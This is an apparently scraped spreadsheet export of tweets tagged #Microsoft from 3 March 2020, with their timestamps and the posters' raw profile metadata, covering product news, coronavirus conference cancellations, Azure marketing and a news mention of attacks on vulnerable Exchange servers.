    <t>{'id': 1114949785067212800, 'id_str': '1114949785067212800', 'name': 'Maynard Partners LLC', 'screen_name': 'MaynardPartners', 'location': 'Washington, Oregon, NorCal', 'description': 'Management, Education and Technology Consulting Services.  Curated by Jack Maynard.', 'url': 'https://t.co/Bnm9lvxP4k', 'entities': {'url': {'urls': [{'url': 'https://t.co/Bnm9lvxP4k', 'expanded_url': 'http://www.maynardpartners.com', 'display_url': 'maynardpartners.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 82, 'listed_count': 0, 'created_at': 'Sun Apr 07 17:55:18 +0000 2019', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1189219472764096512/1N9dAnU-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189219472764096512/1N9dAnU-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1114949785067212800/1554662179',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</si>
  <si>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02:20:48 +0000 2020</t>
  </si>
  <si>
    <t>The Microsoft Surface Laptop 3 has one of the best typing experiences I've ever had on a laptop. 10th gen i7, 16GB ram, and I went ahead and voided the warranty by opening it up &amp;amp; putting liquid metal on it.15% performance boost! #SurfaceLaptop3 #Microsoft
https://t.co/ZN7AciJWJP https://t.co/mxE0Mh9pO3</t>
  </si>
  <si>
    <t>{'id': 1210369402723389440, 'id_str': '1210369402723389440', 'name': 'DaPoets', 'screen_name': 'DaPoetsTerrence', 'location': 'Los Angeles', 'description': 'PC Enthusiast, Overclocker, Tech Reviews, Voider of Warranties.\nFind your balance in life - Terrence', 'url': 'https://t.co/3pwZMWKmAz', 'entities': {'url': {'urls': [{'url': 'https://t.co/3pwZMWKmAz', 'expanded_url': 'https://www.youtube.com/c/DaPoets', 'display_url': 'youtube.com/c/DaPoets', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 90, 'listed_count': 0, 'created_at': 'Fri Dec 27 01:19:13 +0000 2019', 'favourites_count': 441, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 975, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1210369998578802688/Hs694dAB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210369998578802688/Hs694dAB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1210369402723389440/1577410390',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</si>
  <si>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02:20:04 +0000 2020</t>
  </si>
  <si>
    <t>According to @SOC_Prime in the post on @Peerlyst, "Attackers look around for Microsoft Exchange servers vulnerable to CVE-2020-0688". #microsoft #exchange #CVE https://t.co/arVXJj4Rw1</t>
  </si>
  <si>
    <t>{'id': 1154428725909311488, 'id_str': '1154428725909311488', 'name': 'Basheer Ahmed Khan', 'screen_name': 'Basheer_A_Khan', 'location': 'Bengaluru, India', 'description': 'An independent Cyber Security Consultant/Solutions Architect and a Moderator on @Peerlyst. Passionate CyberSecurity blogger. Gender Equality. #NoReligiousTalk', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5407, 'friends_count': 2786, 'listed_count': 21, 'created_at': 'Thu Jul 25 16:30:31 +0000 2019', 'favourites_count': 26277, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6165, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1154428927747612672/SXNvSkiv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154428927747612672/SXNvSkiv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1154428725909311488/1564073888',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</si>
  <si>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02:19:27 +0000 2020</t>
  </si>
  <si>
    <t>#linuxmagazine : "Microsoft is ramping up its efforts in fighting back attackers across all platforms."
Oh yeah?
Why does #microsoft put back doors in everything it makes then? 
https://t.co/fug0FrT0Sq</t>
  </si>
  <si>
    <t>Tue Mar 03 02:17:32 +0000 2020</t>
  </si>
  <si>
    <t>#googlebombing then #linux brand with #microsoft #proprietarysoftware https://t.co/ngpLNIODJB</t>
  </si>
  <si>
    <t>Tue Mar 03 02:10:08 +0000 2020</t>
  </si>
  <si>
    <t>#google and #microsoft just canceled two conferences ahead of their major ones https://t.co/Y8qyi3Xfsi https://t.co/QwFxJDuCCP</t>
  </si>
  <si>
    <t>Tue Mar 03 02:09:59 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/KqDCCuOMcv 
How To Get Sales Of SELECTED Month &amp;amp; Previous 3 Months In Power BI - TAIK18 explained in the video link
#MICROSOFT #POWERBI #TAIK18 #DAX
 #SELECTED #PREVIOUS https://t.co/vDo91w2ch4</t>
  </si>
  <si>
    <t>Tue Mar 03 02:07:26 +0000 2020</t>
  </si>
  <si>
    <t>"I joined Mozilla as a Firefox Telemetry Engineer." #firefox #surveillance developed on #microsoft servers.  https://t.co/qzuLMtMNmt</t>
  </si>
  <si>
    <t>Tue Mar 03 02:05:28 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/EZa1NTNFZQ</t>
  </si>
  <si>
    <t>Tue Mar 03 02:05:01 +0000 2020</t>
  </si>
  <si>
    <t>#ICYMI Azure HDInsight and Azure Database for PostgreSQL news https://t.co/RdbJLotZxS #Azure #Cloud #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 02:01:19 +0000 2020</t>
  </si>
  <si>
    <t>86% of executives blame a lack of teamwork for team problems and failures. Yikes! Check out this infographic for more on how #Teamworksolutions from #Microsoft allow you to work with anyone, inside or outside your business. https://t.co/BJwGObFMyk</t>
  </si>
  <si>
    <t>{'id': 4882750628, 'id_str': '4882750628', 'name': 'Inspired IT', 'screen_name': 'inspired_it', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 47, 'listed_count': 9, 'created_at': 'Tue Feb 09 11:44:46 +0000 2016', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 425, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/785702504902324224/wOowhZvV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/785702504902324224/wOowhZvV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4882750628/1476161040',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</si>
  <si>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02:00:24 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #SurfaceDuo phone #release date, news, features
https://t.co/Mem08mMuv2</t>
  </si>
  <si>
    <t>{'id': 90272103, 'id_str': '90272103', 'name': 'Engin Dikmen', 'screen_name': 'gezgintrk', 'location': 'Turkey / Ä°stanbul', 'description': 'Founder EDS Bilisim #Marketing #DigitalInfluencer #SocialMedia #ClimateChange #SMM  #ElectricVehicle #Mobile #Application  https://t.co/pUx4MaDboi', 'url': 'https://t.co/Z5C0kkYQub', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z5C0kkYQub', 'expanded_url': 'http://www.engindikmen.com', 'display_url': 'engindikmen.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/pUx4MaDboi', 'expanded_url': 'http://tr.linkedin.com/in/engindikmen', 'display_url': 'tr.linkedin.com/in/engindikmen', 'indices': [123, 146]}]}}, 'protected': False, 'followers_count': 11463, 'friends_count': 8439, 'listed_count': 7179, 'created_at': 'Sun Nov 15 23:21:06 +0000 2009', 'favourites_count': 116102, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 340442,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'http://pbs.twimg.com/profile_images/1173662053925556226/1IuE5Hvj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173662053925556226/1IuE5Hvj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/90272103/1568615833',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'regular'}</t>
  </si>
  <si>
    <t>Tue Mar 03 02:00:03 +0000 2020</t>
  </si>
  <si>
    <t>#TransLink improves #bus departure estimates by 74% with #Azure Machine Learning ! #Microsoft #PowerBI #DevOps #Canada Su Maria Sze-Wan Ng https://t.co/tT9ZEiyWHV #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 01:58:50 +0000 2020</t>
  </si>
  <si>
    <t>#JPM #JPMorgan
Nailed it
#MSFT #Microsoft https://t.co/ui6wNJctGo</t>
  </si>
  <si>
    <t>{'id': 457265065, 'id_str': '457265065', 'name': 'Brian', 'screen_name': 'BrianToddWilson', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 13, 'listed_count': 0, 'created_at': 'Sat Jan 07 06:25:08 +0000 2012', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1740203398/brianIF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1740203398/brianIF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/457265065/1583203533',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</si>
  <si>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01:55:00 +0000 2020</t>
  </si>
  <si>
    <t>Apply for multiple openings at a time to increase your chances of getting hired. https://t.co/aHyNMcMd8W #Internship #Microsoft https://t.co/6qBeT5oQ70</t>
  </si>
  <si>
    <t>{'id': 2596150346, 'id_str': '2596150346', 'name': 'Switch Idea', 'screen_name': 'Switch_Idea', 'location': 'India', 'description': 'Switch Idea is a platform that makes internships easy. Employers hire qualified interns, and students get verified internships.', 'url': 'https://t.co/F4a2ry8f3u', 'entities': {'url': {'urls': [{'url': 'https://t.co/F4a2ry8f3u', 'expanded_url': 'https://www.switchidea.com', 'display_url': 'switchidea.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 480, 'friends_count': 15, 'listed_count': 17, 'created_at': 'Mon Jun 30 10:27:24 +0000 2014', 'favourites_count': 57, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8231,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'http://pbs.twimg.com/profile_images/521205915261747200/kbIrO9Xu_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/521205915261747200/kbIrO9Xu_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2596150346/1560040422',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</si>
  <si>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01:51:45 +0000 2020</t>
  </si>
  <si>
    <t>Vatican joins #IBM, #Microsoft to call for #facialrecognition regulation | Article [AMP] | Reuters https://t.co/fkYvCNFQ14</t>
  </si>
  <si>
    <t>{'id': 398907743, 'id_str': '398907743', 'name': 'Sylvie Dan', 'screen_name': 'Sylviedan', 'location': 'Global', 'description': 'COO at Atlantic AI Labs. Fostering African Excellence in Artificial Intelligence', 'url': 'https://t.co/PK6ev4ybBU', 'entities': {'url': {'urls': [{'url': 'https://t.co/PK6ev4ybBU', 'expanded_url': 'http://www.atlanticailabs.com/', 'display_url': 'atlanticailabs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 148, 'friends_count': 117, 'listed_count': 17, 'created_at': 'Wed Oct 26 18:27:46 +0000 2011', 'favourites_count': 71, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2680,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'http://pbs.twimg.com/profile_images/1224477530687709195/7KFIaM6E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224477530687709195/7KFIaM6E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/398907743/1580945044',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</si>
  <si>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01:51:13 +0000 2020</t>
  </si>
  <si>
    <t>Google and Microsoft just canceled two small conferences ahead of their major ones https://t.co/tAEzGpAF1O #microsoft</t>
  </si>
  <si>
    <t>{'id': 844721290959204352, 'id_str': '844721290959204352', 'name': 'rmvp.apac', 'screen_name': 'rmvp_apac', 'location': 'APAC', 'description': '', 'url': 'https://t.co/JSahOxxHPm', 'entities': {'url': {'urls': [{'url': 'https://t.co/JSahOxxHPm', 'expanded_url': 'http://mvp.microsoft.com', 'display_url': 'mvp.microsoft.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 4, 'listed_count': 1, 'created_at': 'Thu Mar 23 01:23:44 +0000 2017', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2416, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/844723537709428736/PMNgjbOo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/844723537709428736/PMNgjbOo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/844721290959204352/1490232587',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</si>
  <si>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01:49:31 +0000 2020</t>
  </si>
  <si>
    <t>Ya Xu, LinkedIn
on theCUBE from Stanford Women in Data Science (WiDS) 2020 
https://t.co/pTNsDNdB8G
@LinkedIn #LinkedIn @Microsoft #Microsoft @Stanford #Stanford #theCUBE #WomenInTech @WiDS_Conference #WiDS2020 https://t.co/RUqywGnFwa</t>
  </si>
  <si>
    <t>Tue Mar 03 01:47:02 +0000 2020</t>
  </si>
  <si>
    <t>#Facebook, #Google, #Microsoft, #Adobe pull out of more conferences as #coronavirus spreads - https://t.co/KpWSXqXLhq</t>
  </si>
  <si>
    <t>Tue Mar 03 01:45:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft officials said they will be delivering Azure, Microsoft 365, Dynamics 365 and the Power Platform from new datacenter regions in Spain. https://t.co/kDpWbnvCOx @ZDNet #Azure #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 01:42:53 +0000 2020</t>
  </si>
  <si>
    <t>John Hoegger, Microsoft
on theCUBE from Stanford Women in Data Science (WiDS) 2020 
https://t.co/pwbutjLj35
@JHoegger @Microsoft #Microsoft @Stanford #Stanford 
#theCUBE #WomenInTech @WiDS_Conference #WiDS2020 https://t.co/Qd9S2kDq8z</t>
  </si>
  <si>
    <t>Tue Mar 03 01:36:37 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft just canceled two #conferences ahead of their major ones. #Tech  https://t.co/B9lECQ4Uga</t>
  </si>
  <si>
    <t>Tue Mar 03 01:35:03 +0000 2020</t>
  </si>
  <si>
    <t>Private AI Bootcamp: Microsoft researchers share knowledge on cryptography, security, and privacy with PhD students https://t.co/WMwunWEOBo #cryptography #security #privacy #Microsoft #AI #Australia</t>
  </si>
  <si>
    <t>Tue Mar 03 01:34:59 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft365 @MicrosoftTeams Loving #microsoft-teams.  Created an online course which is getting great testimonials #CelebrateTeams</t>
  </si>
  <si>
    <t>{'id': 18289924, 'id_str': '18289924', 'name': 'Shelley Fishel', 'screen_name': 'shelleyfishel', 'location': 'London', 'description': 'MSOfficeMaestro - #Microsoft #Office #training for VAs @tomorrowsva#MicrosoftOffice #Word #Excel #PowerPoint #Outlook #Training #Speaker #Tomorrowâ€™sVA', 'url': 'https://t.co/2loePjY1rU', 'entities': {'url': {'urls': [{'url': 'https://t.co/2loePjY1rU', 'expanded_url': 'https://tomorrowsva.com', 'display_url': 'tomorrowsva.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3112, 'friends_count': 2789, 'listed_count': 210, 'created_at': 'Sun Dec 21 18:24:09 +0000 2008', 'favourites_count': 1616, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 43459, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme11/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme11/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1037377630251741184/r4ubuEcG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1037377630251741184/r4ubuEcG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18289924/1539854538', 'profile_link_color': '164182', 'profile_sidebar_border_color': 'ED008A', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '5B545C', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 01:34:35 +0000 2020</t>
  </si>
  <si>
    <t>Reminder: At #LinuxFoundation in 2020 Three Board Members, Including the Vice Chair and Director at Large, Are Current or Past #Microsoft Employees
 https://t.co/VYSAra4PcK</t>
  </si>
  <si>
    <t>Tue Mar 03 01:31:56 +0000 2020</t>
  </si>
  <si>
    <t>From #microsoft to #linuxfoundation https://t.co/CHrycPZJ1s
See https://t.co/nChhoRzPjQ</t>
  </si>
  <si>
    <t>Tue Mar 03 01:30:09 +0000 2020</t>
  </si>
  <si>
    <t>How #Security Leads at #Starbucks and #Microsoft Prepare for #Breaches. #IT #cybersecurity https://t.co/zMlz5yChZB</t>
  </si>
  <si>
    <t>Tue Mar 03 01:28:48 +0000 2020</t>
  </si>
  <si>
    <t>People from #microsoft now write blog posts for #linuxfoundation and call a kernel "operating system" https://t.co/fcs6YMcJKk</t>
  </si>
  <si>
    <t>Tue Mar 03 01:28:29 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft MVP Summit Now A Virtual Conf Over Coronavirus Fears
https://t.co/2XdVPfqiTT https://t.co/ocqR8eVwqk</t>
  </si>
  <si>
    <t>Tue Mar 03 01:22:19 +0000 2020</t>
  </si>
  <si>
    <t>Burst 4K encoding on Azure Kubernetes Service
https://t.co/9OX6F6KLCr
#Microsoft #Azure #Cloud #AKS #K8S #Media #Containers</t>
  </si>
  <si>
    <t>Tue Mar 03 01:19:30 +0000 2020</t>
  </si>
  <si>
    <t>Worth a read: Working remotely during challenging times #Microsoft #RemoteWork https://t.co/l3fDUz1DMs</t>
  </si>
  <si>
    <t>{'id': 34033240, 'id_str': '34033240', 'name': 'Nate Couto', 'screen_name': 'fcouto', 'location': 'Richmond Hill, Ontario', 'description': 'Enthusiast about using data to solve business problems. Consultant, Data &amp; AI @Microsoft. Tweets are my own. ðŸ‡§ðŸ‡·ðŸ‡¨ðŸ‡¦', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 265, 'friends_count': 460, 'listed_count': 32, 'created_at': 'Tue Apr 21 20:39:48 +0000 2009', 'favourites_count': 2637, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2139,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'http://pbs.twimg.com/profile_images/782293502407442433/q9yoDN3r_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/782293502407442433/q9yoDN3r_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34033240/1560599290', 'profile_link_color': '1B95E0',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</si>
  <si>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01:17:02 +0000 2020</t>
  </si>
  <si>
    <t>Miguel de Icaza now interjecting #microsoft #mono into Planet GNOME. As if #gnome is OK with Microsoft employees controlling the discussion.
 https://t.co/feYKhAZxui</t>
  </si>
  <si>
    <t>Tue Mar 03 01:15:45 +0000 2020</t>
  </si>
  <si>
    <t>Join us in Teams meeting on March 7 to discuss #womenintech #womenleadership #iwd2020 #microsoft #microsoftai</t>
  </si>
  <si>
    <t>{'id': 1134685525518966784, 'id_str': '1134685525518966784', 'name': 'Priyanka Shah', 'screen_name': 'fuzzymind1', 'location': '', 'description': 'Passionate about technology, painting and music, avid reader. Speaker at Microsoft for AI, Azure. Love to blog about technology.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 34, 'friends_count': 68, 'listed_count': 1, 'created_at': 'Sat Jun 01 04:58:05 +0000 2019', 'favourites_count': 347, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 88, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1134685980214956033/mlyzehYq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1134685980214956033/mlyzehYq_normal.jpg',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</si>
  <si>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01:15:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Goes All-In On #RPA (Robotic Process Automation). https://t.co/T43ecNKEDL</t>
  </si>
  <si>
    <t>Tue Mar 03 01:12:14 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/tdREfomfQn</t>
  </si>
  <si>
    <t>{'id': 93754327, 'id_str': '93754327', 'name': 'Strata IT, Inc.', 'screen_name': 'StrataIT', 'location': 'Encino, CA', 'description': 'A Strategic IT Solutions Provider geared toward 200 and under. We ensure our clients are provided with enterprise level technology &amp; personal customer service!', 'url': 'http://t.co/O1iacNZPvM', 'entities': {'url': {'urls': [{'url': 'http://t.co/O1iacNZPvM', 'expanded_url': 'http://www.stratait.com', 'display_url': 'stratait.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 218, 'friends_count': 185, 'listed_count': 16, 'created_at': 'Tue Dec 01 01:02:56 +0000 2009', 'favourites_count': 63, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1828,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'http://pbs.twimg.com/profile_images/784553077093371908/5bmmO8jO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/784553077093371908/5bmmO8jO_normal.jpg', 'profile_link_color': '0084B2',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</si>
  <si>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Tue Mar 03 01:11:17 +0000 2020</t>
  </si>
  <si>
    <t>Still running servers on-premises? Looking for a 212% ROI? It's time to move to #Microsoft #Azure. Forrester's financial impact study gives you more reasons to make a move. https://t.co/8dg7ElnQ8z</t>
  </si>
  <si>
    <t>{'id': 18931105, 'id_str': '18931105', 'name': 'Jeff Adzima', 'screen_name': 'jadzima', 'location': 'San Diego', 'description': 'San Diego Virtual CIO, helping your business succeed.', 'url': 'https://t.co/BbsTo0ZoZs', 'entities': {'url': {'urls': [{'url': 'https://t.co/BbsTo0ZoZs', 'expanded_url': 'http://www.netcio.com', 'display_url': 'netcio.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 201, 'friends_count': 311, 'listed_count': 8, 'created_at': 'Tue Jan 13 06:17:04 +0000 2009', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1946, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '127CBA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/964655998848811008/-SlRW5Cl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/964655998848811008/-SlRW5Cl_normal.jpg', 'profile_link_color': '6B2FEF', 'profile_sidebar_border_color': '1E4173', 'profile_sidebar_fill_color': 'EE8122', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 01:10:57 +0000 2020</t>
  </si>
  <si>
    <t>Assistenza Computer a Udine
 3396459223 
 392 1782141
 Viale Palmanova 213 215
#udine #friuliveneziagiulia #fvg 
 #simplythebest 
 HP 14' i5  #hp #EliteBook Intel 
working progress 
#Microsoft... https://t.co/oIUR7QzYeH</t>
  </si>
  <si>
    <t>{'id': 970264704781373440, 'id_str': '970264704781373440', 'name': 'Computerudine.eu', 'screen_name': 'computerudine', 'location': 'Udine, Friuli-Venezia Giulia', 'description': '', 'url': 'https://t.co/wFxgJXTXm7', 'entities': {'url': {'urls': [{'url': 'https://t.co/wFxgJXTXm7', 'expanded_url': 'http://www.computerudine.eu', 'display_url': 'computerudine.eu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 117, 'listed_count': 0, 'created_at': 'Sun Mar 04 11:48:27 +0000 2018', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 169, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/970268258829066245/7MezsO2o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/970268258829066245/7MezsO2o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/970264704781373440/1520164953',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</si>
  <si>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01:10:44 +0000 2020</t>
  </si>
  <si>
    <t>37% of the global workforce is mobile. What could you do with all the time saved from mobile communication tools that take the hassle out of teamwork? Check out this infographic to see how you can benefit from #Teamworksolutions from #Microsoft. https://t.co/5Kz3Ldxrmv</t>
  </si>
  <si>
    <t>{'id': 24628501, 'id_str': '24628501', 'name': 'Joseph Kwong', 'screen_name': 'joekwong', 'location': 'Los Angeles', 'description': 'This is my way to share relevant and practical I.T. information that I come across on the Net. Hope you all like what I have to share!', 'url': 'http://t.co/kkusz9C218', 'entities': {'url': {'urls': [{'url': 'http://t.co/kkusz9C218', 'expanded_url': 'http://www.infoconservices.com', 'display_url': 'infoconservices.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 39, 'listed_count': 1, 'created_at': 'Mon Mar 16 01:49:05 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 766,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'http://pbs.twimg.com/profile_images/1210525930/joekwong_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210525930/joekwong_normal.jpg',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</si>
  <si>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Tue Mar 03 01:10:35 +0000 2020</t>
  </si>
  <si>
    <t>From enhanced services to optimized defense and intelligence operations, read how #Microsoft for Government is empowering public institutions worldwide. https://t.co/p5lexqOpIM</t>
  </si>
  <si>
    <t>Tue Mar 03 01:10:08 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/nj2VeWkxAA</t>
  </si>
  <si>
    <t>Tue Mar 03 01:08:20 +0000 2020</t>
  </si>
  <si>
    <t>Two ways to open up new lines of communication for your business: 1. Deploy #Microsoft #Teams across your organization as the hub for teamwork in #Office365. 2. Subscribe now to this channel. Enable your digital workspace by doing both. https://t.co/eF0xIAa6o3</t>
  </si>
  <si>
    <t>{'id': 2246537150, 'id_str': '2246537150', 'name': 'Net Affinity', 'screen_name': 'Net_Affinity', 'location': 'Sydney/Australia', 'description': 'We are an ICT Company focusing on Managed Services, Business Continuity and Security. Our purpose is to perfectly fuse your business with technology.', 'url': 'https://t.co/6NkeXbO3US', 'entities': {'url': {'urls': [{'url': 'https://t.co/6NkeXbO3US', 'expanded_url': 'https://www.netaffinity.com.au', 'display_url': 'netaffinity.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 30, 'friends_count': 107, 'listed_count': 0, 'created_at': 'Sun Dec 15 03:12:07 +0000 2013', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 340,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'http://pbs.twimg.com/profile_images/1072671128622129160/qCexMAim_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1072671128622129160/qCexMAim_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2246537150/1510264443', 'profile_link_color': 'CC6666',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</si>
  <si>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01:08:12 +0000 2020</t>
  </si>
  <si>
    <t>Analyze the buyer's journey, use embedded intelligence to focus on priorities, and gain social &amp;amp; survey insights by #selling with #Microsoft #Dynamics365. Learn more from Arbela. https://t.co/AjYZr0llvS</t>
  </si>
  <si>
    <t>Tue Mar 03 01:08:11 +0000 2020</t>
  </si>
  <si>
    <t>Thought of sharing this with you all
FREE Headshot for LinkedIn - Visit the LinkedIn Photo Studio - First impressions make a difference. Drop by your Microsoft Store for a headshot refresh. Only from February 2 to March 31.
#Microsoft @bhardia @optizmglobal</t>
  </si>
  <si>
